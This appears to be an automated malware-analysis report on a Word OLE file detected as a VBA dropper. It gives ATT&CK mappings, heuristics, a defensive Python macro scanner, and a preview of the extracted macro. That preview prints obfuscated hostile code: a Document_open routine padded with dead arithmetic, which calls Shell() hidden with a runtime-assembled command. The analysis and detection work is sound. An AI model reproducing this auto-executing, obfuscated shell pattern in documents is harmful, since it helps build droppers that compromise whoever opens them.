Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is an OLE document containing a VBA macro that runs from the Document_Open event, so the payload executes as soon as the document is opened with macros enabled. The macro calls Shell() with a command string that is assembled at runtime by concatenating a long list of variables (plus a CVar("c") fragment) and passes window style 0 (vbHide), so whatever is launched runs without a visible window. The values of those variables are not set anywhere in the portion of the source shown below, so the final command cannot be recovered from the preview alone. The surrounding procedures consist of dead arithmetic on never-assigned variables under On Error Resume Next, a common padding technique used to inflate the module and defeat signature matching. Together these indicate a downloader or dropper. The ClamAV detection name 'Doc.Malware.Valyria-6874597-0' further supports the malicious verdict.
Heuristics (5)

- ClamAV: Doc.Malware.Valyria-6874597-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Valyria-6874597-0
- VBA macros detected [medium] OLE_VBA_MACROS: Document contains VBA macro code (2 related findings)
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard OOXML DrawingML namespace identifier and carries no indicator value on its own.
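As an added example (not the analyzer's own code, and not oletools), the following Python scanner reproduces the OLE_VBA_MACROS, OLE_VBA_DOCOPEN and OLE_VBA_SHELL checks above over decoded VBA source, and adds a junk-arithmetic ratio for the padding pattern visible in the preview of this sample. The sample macro embedded in it is constructed to mirror the preview's structure and is not the real extracted module; the variable names in it are invented, and the heuristic IDs are reused from this report only for readability. Real pipelines should decode the module with olevba first; this scanner only inspects already-decoded text.

```python
"""Static triage of decoded VBA source for the indicators this report fires on.

Added example, not the analyzer's or oletools' code. Decode the VBA module
first (e.g. with olevba); this scanner works on the decoded text only.
"""
import re
from dataclasses import dataclass

# Constructed sample modelled on the preview in this report; it is NOT the
# real extracted module, and the variable names are invented.
SAMPLE_VBA = '''Attribute VB_Name = "mExample"
Private Function pad1()
On Error Resume Next
a1 = 59088 / b1 + 39751 - c1 - d1 + e1 - (41198 - 53982)
a2 = 54477 / b2 + 50257 - c2 - d2 + e2 - (53617 - 52470)
End Function
Private Sub Document_open()
On Error Resume Next
z1 = 29875 + p1 * p2 * p3
Shell "" + part1 + part2 + CVar("c") + part3, 0
z2 = 58054 + q1 * q2 * q3
End Sub
'''

PROC = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+\w+", re.I | re.M)
AUTOEXEC = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec)\b", re.I | re.M)
SHELL_CALL = re.compile(r"^\s*Shell\b(.*)$", re.I | re.M)
HIDDEN_WINDOW = re.compile(r",\s*(?:0|vbHide)\s*$", re.I)   # 2nd Shell arg: vbHide = 0
ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+)$", re.M)
IDENT = re.compile(r"\b[A-Za-z_]\w*\b")
BUILTINS = {"cvar", "chr", "str", "cstr", "shell"}           # VBA functions, not variables


@dataclass
class Finding:
    id: str
    severity: str
    detail: str


def junk_arithmetic_ratio(src: str) -> float:
    """Fraction of assignments whose right-hand side references only variables
    that are never assigned anywhere in the module. Under 'On Error Resume
    Next' such lines evaluate to garbage without failing; they are padding."""
    assigns = ASSIGN.findall(src)
    if not assigns:
        return 0.0
    assigned = {name.lower() for name, _ in assigns}
    junk = 0
    for _, rhs in assigns:
        used = {t.lower() for t in IDENT.findall(rhs)} - BUILTINS
        if used and not (used & assigned):
            junk += 1
    return junk / len(assigns)


def scan(src: str) -> list:
    """Return the findings this report's heuristics would raise on `src`."""
    findings = []
    if PROC.search(src):
        findings.append(Finding("OLE_VBA_MACROS", "medium",
                                "module defines VBA procedures"))
    for m in AUTOEXEC.finditer(src):
        findings.append(Finding("OLE_VBA_DOCOPEN", "high",
                                f"auto-executing procedure {m.group(1)}"))
    for m in SHELL_CALL.finditer(src):
        args = m.group(1).strip()
        detail = "Shell() call"
        if HIDDEN_WINDOW.search(args):
            detail += ", window style 0 (vbHide): runs with no visible window"
        if "+" in args or "&" in args:
            detail += ", command string built by concatenation at runtime"
        findings.append(Finding("OLE_VBA_SHELL", "critical", detail))
    ratio = junk_arithmetic_ratio(src)
    if ratio >= 0.5:
        findings.append(Finding("VBA_JUNK_ARITHMETIC", "info",
                                f"{ratio:.0%} of assignments are dead arithmetic"))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_VBA):
        print(f"[{f.severity}] {f.id}: {f.detail}")
```

The junk ratio is deliberately coarse: it flags a module in which most assignments touch only variables that the module itself never sets, which is exactly the shape of the padding procedures in the preview. It will not resolve the Shell() command, because the concatenated fragments are set nowhere in the text it sees; recovering that command requires either the rest of the module or dynamic execution in a sandbox.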
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 37403 bytes | eaa0d63e99d190a5af05a1cd1a9f0e0a8df289844090e9e651ec036a7a22af85 |
Preview: first 1,000 lines of the extracted script (macros.bas)

```vba
Attribute VB_Name = "mUcbnpwcHupc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function lmWNRcWj()
On Error Resume Next
MbwYXk = 59088 / Bdicv + 39751 - MHrsz - BTjXBW + vZTsj - (41198 - 53982)
mJXKaZ = 54477 / siuMa + 50257 - kDPlc - iVdww + YmAUQk - (53617 - 52470)
UndmpM = 77528 / SOSwM + 30819 - fOBMwz - nRJKl + nrEzNI - (18968 - 24433)
mFvwJ = 65008 / atpjvP + 8311 - klHKI - BWNiH + Jqsaso - (17543 - 40425)
DiUWGd = 22392 / FfVRHw + 26253 - Onkih - CGnkA + qGGjQ - (75780 - 64898)
YbBlu = 82450 / maGXlO + 41346 - RowAL - fbNjaJ + lDGcM - (89018 - 55924)
End Function
Private Function VmLzAoXpswP()
On Error Resume Next
zuInL = (zliMY + JfErXF * 2564 - nwlPcf + NGzHH + fZlIJE)
CawAAD = (wmFkI + waGKAu * 49752 - VzjEn + cWCuXC + uDjAoA)
EkIUV = (vqjAKF + uNZSrR * 25739 - YfRzP + IDhOvd + VzTSkJ)
wBEzN = (OFakq + AVOiS * 73276 - JZkcmF + MMjuTt + PNLBEq)
jjboUp = (jiwVzj + dRvNQY * 54508 - LNFBDW + JLtKal + EPSzf)
End Function
Private Function HsZAuBGCPj()
On Error Resume Next
dtKqB = (dBLhwW + zvElLp * 95827 - orjsBn + zMuqmZ + zdiBp)
MYwAcE = (uOdaDT + Odcwwr * 44507 - HsCNoT + uhRnn + wUjzXq)
msGOTf = (juSaj + KbnwdA * 76285 - roVCih + rCiii + jbbDm)
uUQjtL = (fQmlH + vqiIF * 531 - VThRGs + KocRi + ocwfZX)
iRWjC = (cZQhuc + QDzOPU * 44763 - vJQjE + JszbB + Wcajj)
End Function
Private Sub Document_open()
On Error Resume Next
ZczGbG = 29875 + irXoip * iGXnIX * GhImn * QrkrK * ruTFb - DHVqu * MOmVXz / 37993 * EDWQz
zbrHf = 58054 + wvOAvi * PAPmX * YdvTmX * woXDHm * DjijOH - QqHXBl * pDHda / 29045 * WjXUHn
KqEvvG = 8576 + ARzqFw * NEzWb * GNASa * cXaozj * rsVVFw - cQXRLC * TAEiS / 51003 * EdEdUH
tZWTS = 78453 + zWbjkf * PVJhwn * Yijcd * SUhHY * LRBKqs - SlVuna * fRPGS / 19581 * NUumq
UfpUHw = 37472 + OKSpT * ZCkvC * aBEap * lwwGX * DwzFj - fiqMCF * dqhoRK / 83850 * VHTbOf
mksaj = 41769 + aZHlL * EUjNQQ * qBTsRs * QBDoTW * EzHhfl - ajKKT * lsWUL / 80218 * hkQAI
Shell "" + LsJvBjVfXP + mowkmdHk + CVar("c") + hXrhzHPGUB + vispMFhbG + kdjnkkkf + UFlQZp + ajcHzvhai + zBBLflmcirH + FssPAbNPKB + OzoDEi + RGZtVAn + WuQbfklHaE + cEzLKkV + akZtA + AwclK + msHzLGDMoQ + LawqnGP + XImSlXYUWJ + cOwzmLYDJi, 0
LiodiR = 90078 + UVpuSV * SJUvAc * stVbb * VGLsM * GDjup - PcDHZ * jQUFu / 80595 * vEvpuI
End Sub
Private Function oOnQBzpX()
On Error Resume Next
zMGjd = FcvbNO - WFaNM - 61503 / rqNjV - KnjCp * aziCHJ / rSjzFC + KzjPb / 31959 - iKHzXO + 17553 + Swslh * VoCSEj * uHrIjG
nOhuD = WUbiW - MjamK - 90996 / GfwvZ - EiHGib * izmtV / RCUpHS + kDkuzw / 96316 - YWrSHR + 97224 + POtGSY * ujQdd * lqpcb
Tlftot = Tfltip - BEzBi - 46935 / buKod - SLcKYN * MSDcNO / iplQn + pizuQV / 98961 - srVFKB + 50585 + DaVQr * iBUoQ * UlJtA
DfzIhL = HiWGDq - UkciFO - 71403 / LUkviP - zAFwq * zNSQSD / nTDlY + vRUGR / 5760 - NUcYlc + 62269 + iWBHz * UWKSn * fCrRz
End Function
Private Function RmBhWczQFGvPrP()
On Error Resume Next
LizoW = 42615 + zohbM * zZbhO * BTEimA * jKWOi * SKWTM - NXvoXO * Yiocv / 5115 * LjtGzM
qLaZC = 5773 + FdGPzB * GfhPh * irhbMj * jQPTz * DjjNwM - iZKWf * zpcNZ / 69800 * LbwdwN
rKrER = 53975 + SZdqj * nYEQmh * nGzmT * QaTkH * Mtzrd - WhzLY * tRlLvj / 69697 * nCWkMF
ivLZG = 23557 + dvWNXz * zXKRfV * iaZYaq * SELVT * QuElnp - EqCVIn * CizNj / 424 * zUlAjV
pqpdrv = 51675 + uuTiSF * zHNzM * npnUL * FbQzIE * taUMq - oDupPK * BkhlYi / 61824 * CBCIfO
znrhKU = 78518 + QLmPj * FFfHbQ * qIzvib * dZWJY * OGKloz - iRKpij * Bpkjo / 23574 * Jftmj
End Function
Private Function BoqZzKYvtEcCVO()
On Error Resume Next
fTmMSu = 8188 + ltmvo * iJGBO * IfkXRQ * FBwrFZ * QSEzG - HtDpXi * tujJY / 79158 * ZAiOu
SzpiBL = 41074 + znUEz * lKzLwf * KUzSbH * UTUir * ihrOSJ - uwlqMZ * LLojKZ / 26979 * cqQaD
zWsIYE = 1407 + vZzMzf * dStVz * ztXqdD * WLzbUX * XiAuf - EqqNp * YVfPT / 21086 * rBdURv
... (truncated)
```